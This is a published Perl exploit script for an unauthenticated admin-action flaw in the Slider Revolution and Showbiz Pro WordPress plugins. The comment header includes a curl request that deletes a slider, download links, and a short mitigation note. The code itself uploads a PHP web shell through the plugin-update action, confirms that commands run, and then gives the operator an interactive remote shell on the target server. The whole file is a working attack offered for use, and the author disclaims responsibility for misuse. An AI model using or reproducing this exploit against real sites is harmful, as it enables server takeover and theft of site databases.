#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro) 
# Products url: 
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content whith highly customizable, transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updading plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1" 
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
# > POST /wp-admin/admin-ajax.php HTTP/1.1
# > User-Agent: curl/7.35.0
# > Host: ****.com
# > Accept: */*
# > Content-Length: 73
# > Content-Type: application/x-www-form-urlencoded
# > 
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# < 
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading an web shell:
# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them it in the same directory where you have the exploit.
# 
# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$ 
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have 
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
# auto-update feature on, otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
# as well as the ability to dump the entire wordpress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!

use LWP::UserAgent;
use MIME::Base64;
use strict;

sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Revslider/Showbiz shell upload exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}

if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}

my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";

unless (-e ($zip1 && $zip2))
{ 
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}

my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;

if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}

elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}

elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}

else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}

elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content; 
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);

while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit") 
{ 
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}